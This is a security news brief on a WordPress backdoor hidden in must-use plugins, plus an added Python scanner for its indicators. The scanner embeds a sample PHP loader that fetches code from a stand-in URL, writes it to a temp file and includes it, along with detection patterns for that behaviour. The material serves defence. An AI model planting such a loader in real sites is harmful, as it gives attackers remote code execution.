269/68 Friday, July 25, 2025

Cybersecurity experts at Sucuri have uncovered a new tactic used by threat actors to exploit WordPress systems by embedding a backdoor into a special type of plugin known as a “mu-plugin” (Must-Use Plugin). These plugins are placed in the wp-content/mu-plugins directory and are automatically enabled on every WordPress site without requiring manual activation. Crucially, mu-plugins do not appear in the WordPress admin dashboard’s Plugins page, allowing malware to operate stealthily without raising suspicion.
According to the analysis, attackers deployed a PHP script named wp-index.php in the mu-plugins directory. This script loads malicious code from a remote server using a URL that is obfuscated with ROT13 encoding. Once the code is retrieved, it is written temporarily to disk and executed immediately. The malware also embeds a hidden file manager into the active website theme and creates a new administrator account named “officialwp”, installing an additional malicious plugin called wp-bot-protect.php to maintain full control over the site. It can also reset the passwords of common administrator usernames such as “admin,” “root,” and “wpsupport” to attacker-defined credentials.
Security analysts warn that once such a backdoor is installed, attackers can execute arbitrary actions on the compromised site – including data theft, malware propagation, or redirecting visitors to phishing or scam pages. Website owners are strongly urged to:
- Regularly update WordPress core, themes, and plugins
- Enable two-factor authentication (2FA) for admin accounts
- Routinely inspect the file structure, especially in theme and plugin directories
- Check for unknown files or unauthorized user accounts
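The last two recommendations can be partly automated. The following is an added example, not code from Sucuri or from the original write-up: it walks wp-content/mu-plugins for the file names reported above, decodes any ROT13-wrapped string literal to expose a hidden URL, flags loaders that write fetched data to a temp file and include it, and lists administrator accounts outside an owner-supplied allowlist. The regex heuristics and the sample loader are assumptions constructed for illustration.

```python
import codecs
import re
from pathlib import Path

# Indicators taken from the write-up: file names the campaign dropped into
# wp-content/mu-plugins and the administrator account it created.
KNOWN_BAD_FILES = {"wp-index.php", "wp-bot-protect.php"}
KNOWN_BAD_USERS = {"officialwp"}
# Heuristics (assumptions, not Sucuri signatures): a ROT13-wrapped string
# literal, a temp-file write, and an include/eval that could run it.
ROT13_CALL = re.compile(r"str_rot13\s*\(\s*['\"]([^'\"]+)['\"]\s*\)")
TEMP_WRITE = re.compile(r"\b(tempnam|sys_get_temp_dir|file_put_contents)\s*\(")
EXEC_CODE = re.compile(r"\b(include|include_once|require|require_once)\b|\beval\s*\(")


def scan_php_source(name: str, source: str) -> list:
    """Return human-readable findings for one PHP file's contents."""
    findings = []
    if name in KNOWN_BAD_FILES:
        findings.append(f"{name}: file name matches the reported campaign")
    for literal in ROT13_CALL.findall(source):
        decoded = codecs.decode(literal, "rot13")  # ROT13 is its own inverse
        if decoded.lower().startswith(("http://", "https://")):
            findings.append(f"{name}: ROT13-obfuscated URL {decoded}")
    if TEMP_WRITE.search(source) and EXEC_CODE.search(source):
        findings.append(f"{name}: writes data to disk and executes it")
    return findings


def scan_mu_plugins(wp_content: Path) -> list:
    """Walk wp-content/mu-plugins, which WordPress auto-loads without activation."""
    findings = []
    for php in sorted((wp_content / "mu-plugins").rglob("*.php")):
        findings += scan_php_source(php.name, php.read_text(errors="replace"))
    return findings


def unexpected_admins(admin_usernames, allowlist) -> set:
    """Administrators that are not on the site owner's allowlist."""
    return {u for u in admin_usernames if u in KNOWN_BAD_USERS or u not in allowlist}


# Constructed sample loader mirroring the described behaviour (not the real malware);
# the ROT13 literal decodes to https://example.com/payload.txt.
SAMPLE_LOADER = """<?php
$u = str_rot13('uggcf://rknzcyr.pbz/cnlybnq.gkg');
$t = tempnam(sys_get_temp_dir(), 'wp');
file_put_contents($t, file_get_contents($u));
include $t;
"""
```

Run `scan_mu_plugins(Path("/path/to/wp-content"))` against a site checkout and feed `unexpected_admins()` the output of a user listing from the database; a clean mu-plugins directory yields an empty list.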
Source: https://thehackernews.com/2025/07/hackers-deploy-stealth-backdoor-in.html